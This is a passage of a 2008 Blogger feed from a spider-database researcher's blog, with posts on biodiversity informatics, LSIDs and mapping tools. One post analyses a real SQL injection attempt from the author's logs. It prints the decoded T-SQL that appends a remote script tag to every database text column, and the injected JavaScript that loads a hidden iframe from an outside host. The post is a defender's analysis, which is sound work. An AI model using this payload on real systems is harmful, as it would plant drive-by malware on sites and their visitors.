src="http://farm3.static.flickr.com/2297/2247720522_3f40b69687_m.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://farm1.static.flickr.com/169/467322234_6f0b28f676.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px;" src="http://farm1.static.flickr.com/169/467322234_6f0b28f676.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;One of the DarwinCore elements for specimen and observation data is "habitat". To my knowledge, not a lot has been done with these data. Either there are actually few records cached at GBIF that have this field filled or the data are in a such a mess as to be (mostly) unusable. I certainly hope it's not the latter. No matter how messy, there is still a wealth of information here if one takes the time to sift through it. The data are not unlike folksonomies and someone with more patience than me could probably develop a natural classification of these terms.&lt;br /&gt;&lt;br /&gt;Faceted search is a first crack at making these data useful, because there is certainly more trajectories into the data than without making use of the data. For a first cut at this, I pulled 30 random contributed specimen records in the Nearctic Spider Database for each species and merely display the full contents on the species pages. Then, I index the pages as always using my trusty &lt;a href="http://www.wrensoft.com/zoom/"&gt;Zoom Search&lt;/a&gt;. Voila, a quick way to do some quick, faceted searches. It's not perfect, but it's better than nothing. Where "crab spider bark" or "wolf spider beach" once produced no search results, there are now 5 and 17 results returned, respectively. Incidentally, Flickr produced 13 and 18 results, respectively but many images are useless.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7250700314887531840?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7250700314887531840/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7250700314887531840' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7250700314887531840'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7250700314887531840'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/07/show-mecrab-spiders-on-bark.html' title='Show Me...Crab Spiders on Bark'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://farm3.static.flickr.com/2297/2247720522_3f40b69687_t.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4224266218212895426</id><published>2008-07-20T22:08:00.002-06:00</published><updated>2008-07-20T22:12:08.955-06:00</updated><title type='text'>Green Porno</title><content type='html'>I couldn't resist sharing these. Pure genius. Kudos to Isabella Rossellini.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a href="http://www.sundancechannel.com/greenporno"&gt;&lt;img src="http://arco.vo.llnwd.net/o2/cust9/FLV/640x480/original/green_porno/bumperstickers/gp_bumpersticker1.jpg" border="0" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4224266218212895426?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4224266218212895426/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4224266218212895426' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4224266218212895426'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4224266218212895426'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/07/green-porno.html' title='Green Porno'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3300345904447715973</id><published>2008-07-20T15:09:00.006-06:00</published><updated>2008-07-20T17:53:43.916-06:00</updated><title type='text'>SQL Injection Attacks!</title><content type='html'>I was browsing through my web logs this morning and discovered some clever attempts to hack into my database using a technique called &lt;a href="http://en.wikipedia.org/wiki/SQL_injection"&gt;SQL injection&lt;/a&gt;. Here's a portion of one line in the web log:&lt;br /&gt;&lt;blockquote&gt;/data/canada_spiders/AllReferences.asp Letter=F;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...&lt;strong&gt;more crap here&lt;/strong&gt;...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--&lt;/blockquote&gt;&lt;br /&gt;The semicolon after "Letter=F" above is an attempt to mark the close of the SQL within the page "/data/canada_spiders/AllReferences.asp" and everything else after it is crap that &lt;em&gt;could&lt;/em&gt; be executed on the server. Had I constructed my SQL on the page to be something like:&lt;br /&gt;&lt;blockquote&gt;SELECT * FROM [TABLE] WHERE [COLUMN] = "" &amp; [LETTER F] &amp; ""&lt;/blockquote&gt;&lt;br /&gt;...where [LETTER F] is the parameter passed from the URL, I would have exposed myself to something potentially serious. So, instead of:&lt;br /&gt;&lt;blockquote&gt;SELECT * FROM [TABLE] WHERE [COLUMN] = "F"&lt;/blockquote&gt;&lt;br /&gt;...the executed SQL would have been:&lt;br /&gt;&lt;blockquote&gt;SELECT * FROM [TABLE] WHERE [COLUMN] = "F";DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...&lt;strong&gt;more crap here&lt;/strong&gt;...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--&lt;/blockquote&gt;&lt;br /&gt;Cool.&lt;br /&gt;&lt;br /&gt;So, just what is all that crap? Well, it's a SQL Server-specific bit of code that is HEX-encoded. The full decoded HEX is as follows:&lt;br /&gt;&lt;blockquote&gt;DECLARE @T VARCHAR(255),@C VARCHAR(255) &lt;br /&gt;DECLARE Table_Cursor CURSOR FOR&lt;br /&gt;SELECT a.name,b.name FROM sysobjects a,syscolumns b&lt;br /&gt;WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)&lt;br /&gt;OPEN Table_Cursor&lt;br /&gt;FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)&lt;br /&gt;BEGIN&lt;br /&gt;EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''&amp;lt;script src=http://www.bnrc.ru/ngg.js&amp;gt;&amp;lt;/script&amp;gt;''')&lt;br /&gt;FETCH NEXT FROM Table_Cursor INTO @T,@C&lt;br /&gt;END&lt;br /&gt;CLOSE Table_Cursor&lt;br /&gt;DEALLOCATE Table_Cursor&lt;/blockquote&gt;&lt;br /&gt;Hmm. What does this mean? Well, it's an attempt to do something very scary - update every cell in every table to include a reference to a snippet of JavaScript. So, the next time any data are pulled from the database for presentation on a website, there is the potential to include hundreds of references to a remote JavaScript file.&lt;br /&gt;&lt;br /&gt;So, what's in the JavaScript? This:&lt;br /&gt;&lt;blockquote&gt;window.status="";&lt;br /&gt;var cookieString = document.cookie;&lt;br /&gt;var start = cookieString.indexOf("dssndd=");&lt;br /&gt;if (start != -1){}else{&lt;br /&gt;var expires = new Date();&lt;br /&gt;expires.setTime(expires.getTime()+9*3600*1000);&lt;br /&gt;document.cookie = "dssndd=update;expires="+expires.toGMTString();&lt;br /&gt;try{&lt;br /&gt;document.write("&amp;lt;iframe src=http://iogp.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0&amp;gt;&amp;lt;/iframe&amp;gt;");&lt;br /&gt;}&lt;br /&gt;catch(e)&lt;br /&gt;{&lt;br /&gt;};&lt;br /&gt;}&lt;/blockquote&gt;&lt;br /&gt;OK, so an iframe is inserted. Cripes, will it ever end? What's in the iframe? A page with some obfuscated JavaScript that loads with the rendering of the page. This is as far as I got. But, others have also discovered this and note that the JavaScript in that iframe is at least a redirect to msn.com. If you conduct a search for "ngg.js", you can pull up a whole heap of sites indexed by Google that have apparently been affected with this SQL injection attack. So, if you visit a web site, click a link and get mysteriously redirected to msn.com, something may have just happened to your browser.&lt;br /&gt;&lt;br /&gt;But, I have still not idea what the ultimate end game is. What the heck is in the obfuscated JavaScript in the iframe? Anyone?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3300345904447715973?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3300345904447715973/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3300345904447715973' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3300345904447715973'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3300345904447715973'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/07/sql-injection-attacks.html' title='SQL Injection Attacks!'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5587946970381544650</id><published>2008-07-19T12:57:00.003-06:00</published><updated>2008-07-19T13:12:41.766-06:00</updated><title type='text'>Google Geocodes</title><content type='html'>Since I have been on a kick this weekend getting back into the mapping thing, I decided to see what was new in the world of the Google Map API and discovered plenty of new great things. For example, folks have developed &lt;a href="http://nicogoeminne.googlepages.com/documentation.html"&gt;reverse geocoders&lt;/a&gt;. It's a shame however that the full &lt;a href="http://www.iso.org/iso/country_codes/iso_3166_code_lists/english_country_names_and_code_elements.htm"&gt;ISO country names&lt;/a&gt; aren't used. Rather, only the country codes are made available via &lt;a href="http://code.google.com/apis/maps/documentation/services.html"&gt;Google's geocode API&lt;/a&gt;. I would have much rather had the full country name and the full "AdministrativeAreaName" (i.e. the State or Province in Google Map API parlance) because I could then use this in the AJAX data grid for contributors of specimen records to the Nearctic Spider Database. Similarly, applications like &lt;a href="http://www.specifysoftware.org/Specify"&gt;Specify&lt;/a&gt; could have taken advantage of this to help users clean or check their data as these are entered.&lt;br /&gt;&lt;br /&gt;Nevertheless, I tweaked my old &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/LocalitiesGeocoder.asp"&gt;Google Map Geocoder&lt;/a&gt; to take advantage of all these advancements. The point of this little gadget is to click a map and get the location and coordinates. In this era of &lt;a href="http://www.apple.com/iphone/features/maps.html"&gt;GPS units and iPhones&lt;/a&gt;, this may be rather pointless. But it was fun to see what I could do in an hour or so.&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org/data/canada_spiders/LocalitiesGeocoder.asp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/SII7ivYjSLI/AAAAAAAAAFc/3M6j9VqxgPs/s320/reversegeocode.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5224803985724229810" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5587946970381544650?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5587946970381544650/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5587946970381544650' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5587946970381544650'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5587946970381544650'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/07/google-geocodes.html' title='Google Geocodes'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/SII7ivYjSLI/AAAAAAAAAFc/3M6j9VqxgPs/s72-c/reversegeocode.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3207474495992053654</id><published>2008-07-18T09:14:00.004-06:00</published><updated>2008-07-18T09:30:20.734-06:00</updated><title type='text'>Simple Mapper</title><content type='html'>With the recent mapping craze this past decade and the fascination with AJAX tiling, a serious deficiency has been a simple mechanism to produce a black &amp; white line map with points to mark collection locations for use in an outgoing manuscript. While at the recent American Arachnological Society meetings at Berkeley, California, I casually mentioned in a presentation I gave about the Nearctic Spider Database that someone should make such a service. Well, I made one...at least the start of one, right &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/SimpleMapper.asp"&gt;HERE&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;I know, I know, yet another mapping service. But, this one serves a very specific purpose. It could no doubt be expanded and made more customizable such as different points for multiple species (a bit tougher) and an option to use a global map instead (trivial), but it's a start to producing something that hopefully satisfies a very different need.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org/data/canada_spiders/SimpleMapper.asp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/SIC2dcwoqDI/AAAAAAAAAFU/gTSjn1_HFOU/s320/mapserv.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5224376184802420786" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3207474495992053654?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3207474495992053654/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3207474495992053654' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3207474495992053654'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3207474495992053654'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/07/simple-mapper.html' title='Simple Mapper'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/SIC2dcwoqDI/AAAAAAAAAFU/gTSjn1_HFOU/s72-c/mapserv.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7014168800112904605</id><published>2008-05-12T05:09:00.007-06:00</published><updated>2008-05-12T05:53:35.167-06:00</updated><title type='text'>Life Science Identifiers (LSIDs) - Why?</title><content type='html'>The &lt;a href="http://www.catalogueoflife.org"&gt;Catalogue of Life&lt;/a&gt; (CoLP) recently released its 2008 checklist and has now implemented Life Science Identifiers (LSIDs). In the past, the Catalogue of Life changed its identifiers with every new version, thus forcing database owners who made use of CoLP names and identifiers to reconstruct their databases if they wished to maintain some sort of external linking to an authoritative source.&lt;br /&gt;&lt;br /&gt;If you're not familiar with LSIDs, this from the sourceforge &lt;a href="http://lsids.sourceforge.net/"&gt;LSID resolution project&lt;/a&gt;:&lt;br /&gt;&lt;blockquote&gt;Life Science Identifiers (LSIDs) are persistent, location-independent, resource identifiers for uniquely naming biologically significant resources including species names, concepts, occurrences, genes or proteins, or data objects that encode information about them. To put it simply, LSIDs are a way to identify and locate pieces of biological information on the web.&lt;/blockquote&gt;This is how LSIDs are constructed:&lt;br /&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/SCgoA8FaVtI/AAAAAAAAAFM/Jez76kopY7o/s400/lsid-syntax-diagram.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5199449766393173714" /&gt;&lt;br /&gt;&lt;br /&gt;So, what can one do with an LSID? Well, given an LSID, one can get some metadata for that data object. This assumes of course that the authority at the other end is alive and ready to serve the metatdata. There is not a central authority as is the case with Digital Object Identifiers (DOIs) used by the publication industry.&lt;br /&gt;&lt;br /&gt;For starters, one can resolve LSIDs using various online resources. Examples:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Biodiversity Information Standards (TWDG): &lt;a href="http://lsid.tdwg.org/"&gt;LSID resolver&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Rod Page: &lt;a href="http://linnaeus.zoology.gla.ac.uk/~rpage/lsid/tester/"&gt;LSID tester&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;/ol&gt;&lt;br /&gt;Because of the distributed nature of LSID authorities (its ultimately based on DNS), there is of course nothing preventing the same taxon name from having multiple identifiers or one authority from serving multiple LSIDs for the same taxon name. For example, the namestring for the fishing spider &lt;a href="http://www.canadianarachnology.org/data/spiders/19664"&gt;&lt;em&gt;Dolomedes tenebrosus&lt;/em&gt; Hentz, 1844&lt;/a&gt; has no less than 3 LSIDs that resolve to three different authorities:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;uBio:&lt;/strong&gt; urn:lsid:ubio.org:namebank:2072956&lt;br /&gt;&lt;strong&gt;Catalogue of Life 2008:&lt;/strong&gt; urn:lsid:catalogueoflife.org:taxon:f3b7cf14-29c1-102b-9a4a-00304854f820:ac2008 (ugh!)&lt;br /&gt;&lt;strong&gt;The World Spider Catalog:&lt;/strong&gt; urn:lsid:amnh.org:spidersp:019664&lt;br /&gt;&lt;br /&gt;The uBio and the Catalogue of Life LSIDs for this spider resolve, but the AMNH LSID is nothing more than a pointer at this stage because at the time of writing does not yet have a functioning resolution service.&lt;br /&gt;&lt;br /&gt;Which LSID is a database owner supposed to use? Are LSIDs meant to be currencies that either crumble or presist under Darwinian market pressures? What I want to do is store an LSID in my relational database such that I can more confidently link names with other sources of information such as information about the type specimens, gene sequences, synonyms, specimens etc. The uBio LSID above is nice and compact, but no one but me and uBio would use it. &lt;a href="http://www.amnh.org/science/divisions/invertzoo/bio.php?scientist=platnick"&gt;Norm Platnick&lt;/a&gt; wasn't aware that uBio had LSIDs for spider names! The World Spider Catalog LSID above is also nice and compact, but it doesn't resolve. The Catalogue of Life LSID is downright awful because I can't merely use the object identification as a stand-alone integer.&lt;br /&gt;&lt;br /&gt;So, I'll continue to use "&lt;em&gt;Dolomedes tenebrosus&lt;/em&gt; Hentz, 1844" thank you very much. A decentralized identifer system is failing me.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7014168800112904605?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7014168800112904605/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7014168800112904605' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7014168800112904605'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7014168800112904605'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/05/life-science-identifiers-lsids-why.html' title='Life Science Identifiers (LSIDs) - Why?'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/SCgoA8FaVtI/AAAAAAAAAFM/Jez76kopY7o/s72-c/lsid-syntax-diagram.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4995476045403453015</id><published>2008-04-16T18:19:00.003-06:00</published><updated>2008-04-16T18:42:01.281-06:00</updated><title type='text'>Who's Organizing the Type Specimens</title><content type='html'>Circulating on Taxacom and elsewhere was a note and a petition that has me really worried:&lt;br /&gt;&lt;blockquote&gt;On 26th March 2008 the University Board of Utrecht University, The Netherlands, informed the employees of the Utrecht Herbarium that as of 1 June 2008 the Herbarium is to be closed and, with immediate effect, access to the collections, from national as well as international workers, is to cease.&lt;/blockquote&gt;&lt;br /&gt;The above is straight off the Utrecht University website &lt;a href="http://www.nationale-plantencollectie.nl/HerbariumUtrecht/index-UK.html"&gt;HERE&lt;/a&gt; where you can at least sign the online petition.&lt;br /&gt;&lt;br /&gt;Where is the real source of this alarming decision? Do administrators see the doors to the herbarium as already closed so it's a simple decision to just bolt them shut?&lt;br /&gt;&lt;br /&gt;Tim Robertson (GBIF) has been at the EOL informatics offices these past few days where some interesting ideas have been flying around. One of GBIF's original goals as near as I could remember was to expose the physical location and metadata for type specimens. But, I think a barrier to making this happen was the concentration on a distributed model to harvest and display ALL specimen and observational data in a consistent fashion. These are important sociological considerations but are tangential to the goal. What I would love to see is a simple web page for curators to input their type specimen data. Forget about the distributed data model. Type the data in and get an assigned LSID or some other identifier that can be used in perpetuity. Also type in the citation for the orginial description. Those three bits will serve as the most important scaffolding for all of biology. The metadata schema (if you still think in XML docs) is also laughably easy and the services to be built off this are embarrassingly useful. It is an immense source of pride for institutions (and curators!) to tell the world what type specimens are held behind their walls. Administrators cue in on that.&lt;br /&gt;&lt;br /&gt;Tim Robertson and other developers in the Global informatics community are a passionate bunch and can see around corners, recognize the obstacles, and want the projects they represent to be huge successes. So, congrats Tim for your work on mapping and I hope there are other great things to come.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4995476045403453015?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4995476045403453015/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4995476045403453015' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4995476045403453015'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4995476045403453015'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/04/whos-organizing-type-specimens.html' title='Who&apos;s Organizing the Type Specimens'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-2447577862331964825</id><published>2008-04-15T05:42:00.003-06:00</published><updated>2008-04-15T05:54:41.566-06:00</updated><title type='text'>Just Gimme the Current Name!</title><content type='html'>As a graduate student who collected a bunch of names to be stuffed into an Appendix, it was not a trivial task to ensure the names I used were the currently recognized nomenclature. One of the first things a reviewer of any publication containing an Appendix of names will do is check that the names are all correct. In spider circles, that means several dozen trips to Norm Platnick's &lt;a href="http://research.amnh.org/entomology/spiders/catalog/"&gt;World Spider Catalog&lt;/a&gt;. It would be so much easier for everyone involved if Norm had one big text box in which people could paste all the names and have every name be cross-checked with what is in the Catalog.&lt;br /&gt;&lt;br /&gt;Coincidentally, it appears that many people who visit the Nearctic Spider Database use its search box to just get the full name string. I wonder how many searches on Google are the same! So, I made one. Sure, there are programmtic issues. But, I can catch those names that might potentially be ambiguous and tell you about them. I can also tell you if you misspelled a name or if a name you searched on isn't in The Nearctic Spider Database...remember that the database is regionally centric...and someone (me!) has to keep on top of potential species introductions, treatments, etc. because any checklist or database will never be complete.&lt;br /&gt;&lt;br /&gt;So, give it a shot:&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org/data/canada_spiders/NameSpider.asp"&gt;&lt;img style="cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/SASXEJZftwI/AAAAAAAAAFE/2L732Quc7KI/s400/search.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5189438768135780098" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-2447577862331964825?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/2447577862331964825/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=2447577862331964825' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2447577862331964825'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2447577862331964825'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/04/just-gimme-current-name.html' title='Just Gimme the Current Name!'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/SASXEJZftwI/AAAAAAAAAFE/2L732Quc7KI/s72-c/search.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3044087211698183030</id><published>2008-03-26T20:34:00.003-06:00</published><updated>2008-03-26T20:59:18.746-06:00</updated><title type='text'>I Got Useful Data...and Caught You Unaware</title><content type='html'>A recent reply to a post in Taxacom got me thinking more deeply about capturing workflows (see &lt;a href="http://mailman.nhm.ku.edu/pipermail/taxacom/2008-March/026834.html"&gt;thread&lt;/a&gt;):&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;The 'becomes part of daily routines on the workdesks of experts' is a&lt;br /&gt;crucial part of this 'revolution' - the few experts left need an&lt;br /&gt;incentive to abandon their word processors/spreadsheets/databases and&lt;br /&gt;the incentive would be a workdesk with all the comfort factors that&lt;br /&gt;these software applications give them and a whole heap of bonus&lt;br /&gt;attributes which make it a no-brainer to adopt ... If (big if) the&lt;br /&gt;majority of experts used this workdesk the&lt;br /&gt;adSense-like/referral/ebay-feedback stuff going on in the background&lt;br /&gt;would automatically improve the GBIF (and others - EoL??) content. The&lt;br /&gt;good stuff rises the bad stuff falls - its always been this way, based&lt;br /&gt;on a traditionally  published monograph/fauna/flora/mycota/biota&lt;br /&gt;typically on a 10-25 year cycle; in the 21st century digital age it&lt;br /&gt;should be a tad quicker.&lt;br /&gt;&lt;br /&gt;Paul&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;I'm happy to hear people are beginning to think of a "workdesk" as I envision the EOL WorkBench, which coincidentally I am internally calling "LifeDesk". This is how I described it some time ago on Taxacom (&lt;a href="http://mailman.nhm.ku.edu/pipermail/taxacom/2007-May/025491.html"&gt;here&lt;/a&gt;). My thinking has shifted somewhat since then, but the give &amp; take concept still holds.&lt;br /&gt;&lt;br /&gt;A few concrete examples:&lt;br /&gt;&lt;br /&gt;I modified my twirly, AJAXy reference look-up tool (also present on some exemplar EOL species pages like &lt;a href="http://www.eol.org/taxa/16252751"&gt;this one&lt;/a&gt;) to actually store the reprint metadata from CrossRef before it gets passed through to the user. The user gets the benefit of knowing there's a reprint available to download - they just click the little icon a second time - and I get the benefit of all the metadata for later use.&lt;br /&gt;&lt;br /&gt;In doing some reading and fumbling with Adobe AIR, I stumbled across &lt;a href="http://gasi.ch/blog/2007/11/19/photospread-a-spreadsheet-for-managing-photos/"&gt;PhotoSpread&lt;/a&gt; (&lt;a href="http://dbpubs.stanford.edu:8090/pub/showDoc.Fulltext?lang=en&amp;doc=2007-28&amp;format=pdf&amp;compression=&amp;name=2007-28.pdf"&gt;PDF&lt;/a&gt;). This app is a clever hybrid between Excel and Flickr. Dragging/dropping images coordinates regroupings or filters. As a consequence, metadata tags are automatically created.&lt;br /&gt;&lt;br /&gt;So, while I think a "WorkBench", 